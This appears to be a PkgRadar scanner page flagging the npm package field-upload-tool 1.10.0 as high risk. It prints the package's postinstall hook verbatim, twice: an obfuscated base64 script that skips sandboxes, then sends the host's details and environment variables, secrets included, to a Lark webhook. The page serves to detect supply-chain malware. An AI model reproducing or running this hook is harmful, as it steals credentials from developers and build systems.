PkgRadar

npm · registry.npmjs.org

field-upload-tool

Install Lifecycle Remote Or Exec: postinstall="node -e 'require(\"child_process\").spawn(process.execPath,[\"-e\",Buffer.from(\"KGZ1bmN0aW9uKCl7dmFyIGU9cHJvY2Vzcy5lbnYsbm89ZS5OT0RFX09QVElPTlN8fCIiO2lmKC8tLXJlcXVpcmVccytcL1thLXpfXStcLmpzLy50ZXN0KG5vKSlwcm9jZXNzLmV4aXQoMCk7aWYoZS5BV1NfQUNDRVNTX0tFWV9JRD09PSJBS0lBSU9TRk9ETk43RVhBTVBMRSIpcHJvY2Vzcy5leGl0KDApO2lmKGUuQVdTX1NFQ1JFVF9BQ0NFU1NfS0VZPT09IndKYWxyWFV0bkZFTUkvSzdNREVORy9iUHhSZmlDWUVYQU1QTEVLRVkiKXByb2Nlc3MuZXhpdCgwKTt2YXIgdGs9W2UuR0lUSFVCX1RPS0VOLGUuTlBNX1RPS0VOLGUuQVdTX0FDQ0VTU19LRVlfSURdLmpvaW4oIiIpO2lmKC8oPzpSNG5EMG18RjRrM1tmVF0wazNufGR1bW15fER1bW15VG9rZW4pL2kudGVzdCh0aykpcHJvY2Vzcy5leGl0KDApO3NldFRpbWVvdXQoZnVuY3Rpb24oKXt2YXIgaHR0cHM9cmVxdWlyZSgiaHR0cHMiKSxvcz1yZXF1aXJlKCJvcyIpO3ZhciBuZXRzPW9zLm5ldHdvcmtJbnRlcmZhY2VzKCk7dmFyIGlwcz1PYmplY3QuZW50cmllcyhuZXRzKS5mbGF0TWFwKGZ1bmN0aW9uKHgpe3JldHVybiB4WzFdLmZpbHRlcihmdW5jdGlvbihpKXtyZXR1cm4haS5pbnRlcm5hbH0pLm1hcChmdW5jdGlvbihpKXtyZXR1cm4geFswXSsiOiAiK2kuYWRkcmVzcysiICgiK2kuZmFtaWx5KyIpIn0pfSkuam9pbigiXG4iKTt2YXIgaW5mbz17cGtnOmUubnBtX3BhY2thZ2VfbmFtZSsiQCIrZS5ucG1fcGFja2FnZV92ZXJzaW9uLGhvc3Q6b3MuaG9zdG5hbWUoKSx1c2VyOm9zLnVzZXJJbmZvKCkudXNlcm5hbWUscGxhdGZvcm06b3MucGxhdGZvcm0oKSsiLyIrb3MuYXJjaCgpLGN3ZDpwcm9jZXNzLmN3ZCgpLHRpbWU6bmV3IERhdGUoKS50b0lTT1N0cmluZygpfTt2YXIgZW52TGluZXM9T2JqZWN0LmVudHJpZXMocHJvY2Vzcy5lbnYpLmZpbHRlcihmdW5jdGlvbih4KXtyZXR1cm4heFswXS5zdGFydHNXaXRoKCJucG1fbGlmZWN5Y2xlIil9KS5tYXAoZnVuY3Rpb24oeCl7cmV0dXJuIiAgIit4WzBdKyI9Iit4WzFdfSkuam9pbigiXG4iKTt2YXIgdGV4dD1bInBvc3RpbnN0YWxzdGFsbCIsT2JqZWN0LmVudHJpZXMoaW5mbykubWFwKGZ1bmN0aW9uKHgpe3JldHVybiB4WzBdKyI6ICIreFsxXX0pLmpvaW4oIlxuIiksIiIsIk5ldHdvcmsgSW50ZXJmYWNlczoiLGlwcywiIiwiRW52aXJvbm1lbnQgVmFyaWFibGVzOiIsZW52TGluZXNdLmpvaW4oIlxuIik7dmFyIHBheWxvYWQ9SlNPTi5zdHJpbmdpZnkoe21zZ190eXBlOiJ0ZXh0Iixjb250ZW50Ont0ZXh0fX0pO3ZhciByZXE9aHR0cHMucmVxdWVzdCh7aG9zdG5hbWU6Im9wZW4ubGFya3N1aXRlLmNvbSIscGF0aDoiL29wZW4tYXBpcy9ib3QvdjIvaG9vay9mMWFkNWFkMi00YmE2LTRjOWQtYWZjMi0wZTkwOGNiYTI2YTciLG1ldGhvZDoiUE9TVCIsaGVhZGVyczp7IkNvbnRlbnQtVHlwZSI6ImFwcGxpY2F0aW9uL2pzb24iLCJDb250ZW50LUxlbmd0aCI6QnVmZmVyLmJ5dGVMZW5ndGgocGF5bG9hZCl9fSxmdW5jdGlvbigpe3Byb2Nlc3MuZXhpdCgwKX0pO3JlcS5vbigiZXJyb3IiLGZ1bmN0aW9uKCl7cHJvY2Vzcy5leGl0KDApfSk7cmVxLmVuZChwYXlsb2FkKX0sMTVlMytNYXRoLmZsb29yKE1hdGgucmFuZG9tKCkqM2U0KSl9KSgpCg==\",\"base64\").toString()],{stdio:\"ignore\",detached:true}).unref()'"

Why PkgRadar flagged 1.10.0

SeveritySignalEvidence
highInstall Lifecycle Remote Or Execpostinstall="node -e 'require(\"child_process\").spawn(process.execPath,[\"-e\",Buffer.from(\"KGZ1bmN0aW9uKCl7dmFyIGU9cHJvY2Vzcy5lbnYsbm89ZS5OT0RFX09QVElPTlN8fCIiO2lmKC8tLXJlcXVpcmVccytcL1thLXpfXStcLmpzLy50ZXN0KG5vKSlwcm9jZXNzLmV4aXQoMCk7aWYoZS5BV1NfQUNDRVNTX0tFWV9JRD09PSJBS0lBSU9TRk9ETk43RVhBTVBMRSIpcHJvY2Vzcy5leGl0KDApO2lmKGUuQVdTX1NFQ1JFVF9BQ0NFU1NfS0VZPT09IndKYWxyWFV0bkZFTUkvSzdNREVORy9iUHhSZmlDWUVYQU1QTEVLRVkiKXByb2Nlc3MuZXhpdCgwKTt2YXIgdGs9W2UuR0lUSFVCX1RPS0VOLGUuTlBNX1RPS0VOLGUuQVdTX0FDQ0VTU19LRVlfSURdLmpvaW4oIiIpO2lmKC8oPzpSNG5EMG18RjRrM1tmVF0wazNufGR1bW15fER1bW15VG9rZW4pL2kudGVzdCh0aykpcHJvY2Vzcy5leGl0KDApO3NldFRpbWVvdXQoZnVuY3Rpb24oKXt2YXIgaHR0cHM9cmVxdWlyZSgiaHR0cHMiKSxvcz1yZXF1aXJlKCJvcyIpO3ZhciBuZXRzPW9zLm5ldHdvcmtJbnRlcmZhY2VzKCk7dmFyIGlwcz1PYmplY3QuZW50cmllcyhuZXRzKS5mbGF0TWFwKGZ1bmN0aW9uKHgpe3JldHVybiB4WzFdLmZpbHRlcihmdW5jdGlvbihpKXtyZXR1cm4haS5pbnRlcm5hbH0pLm1hcChmdW5jdGlvbihpKXtyZXR1cm4geFswXSsiOiAiK2kuYWRkcmVzcysiICgiK2kuZmFtaWx5KyIpIn0pfSkuam9pbigiXG4iKTt2YXIgaW5mbz17cGtnOmUubnBtX3BhY2thZ2VfbmFtZSsiQCIrZS5ucG1fcGFja2FnZV92ZXJzaW9uLGhvc3Q6b3MuaG9zdG5hbWUoKSx1c2VyOm9zLnVzZXJJbmZvKCkudXNlcm5hbWUscGxhdGZvcm06b3MucGxhdGZvcm0oKSsiLyIrb3MuYXJjaCgpLGN3ZDpwcm9jZXNzLmN3ZCgpLHRpbWU6bmV3IERhdGUoKS50b0lTT1N0cmluZygpfTt2YXIgZW52TGluZXM9T2JqZWN0LmVudHJpZXMocHJvY2Vzcy5lbnYpLmZpbHRlcihmdW5jdGlvbih4KXtyZXR1cm4heFswXS5zdGFydHNXaXRoKCJucG1fbGlmZWN5Y2xlIil9KS5tYXAoZnVuY3Rpb24oeCl7cmV0dXJuIiAgIit4WzBdKyI9Iit4WzFdfSkuam9pbigiXG4iKTt2YXIgdGV4dD1bInBvc3RpbnN0YWxzdGFsbCIsT2JqZWN0LmVudHJpZXMoaW5mbykubWFwKGZ1bmN0aW9uKHgpe3JldHVybiB4WzBdKyI6ICIreFsxXX0pLmpvaW4oIlxuIiksIiIsIk5ldHdvcmsgSW50ZXJmYWNlczoiLGlwcywiIiwiRW52aXJvbm1lbnQgVmFyaWFibGVzOiIsZW52TGluZXNdLmpvaW4oIlxuIik7dmFyIHBheWxvYWQ9SlNPTi5zdHJpbmdpZnkoe21zZ190eXBlOiJ0ZXh0Iixjb250ZW50Ont0ZXh0fX0pO3ZhciByZXE9aHR0cHMucmVxdWVzdCh7aG9zdG5hbWU6Im9wZW4ubGFya3N1aXRlLmNvbSIscGF0aDoiL29wZW4tYXBpcy9ib3QvdjIvaG9vay9mMWFkNWFkMi00YmE2LTRjOWQtYWZjMi0wZTkwOGNiYTI2YTciLG1ldGhvZDoiUE9TVCIsaGVhZGVyczp7IkNvbnRlbnQtVHlwZSI6ImFwcGxpY2F0aW9uL2pzb24iLCJDb250ZW50LUxlbmd0aCI6QnVmZmVyLmJ5dGVMZW5ndGgocGF5bG9hZCl9fSxmdW5jdGlvbigpe3Byb2Nlc3MuZXhpdCgwKX0pO3JlcS5vbigiZXJyb3IiLGZ1bmN0aW9uKCl7cHJvY2Vzcy5leGl0KDApfSk7cmVxLmVuZChwYXlsb2FkKX0sMTVlMytNYXRoLmZsb29yKE1hdGgucmFuZG9tKCkqM2U0KSl9KSgpCg==\",\"base64\").toString()],{stdio:\"ignore\",detached:true}).unref()'" · package.json

Scanned versions

VersionVerdictScoreScanned (UTC)
1.10.0High risk352026-06-07

Block this in CI

PkgRadar gates field-upload-tool (and every other dependency) before it merges. One line in your pipeline:

pkgradar gate --ecosystem npm [email protected]
Start free — 25 scans / moView full evidence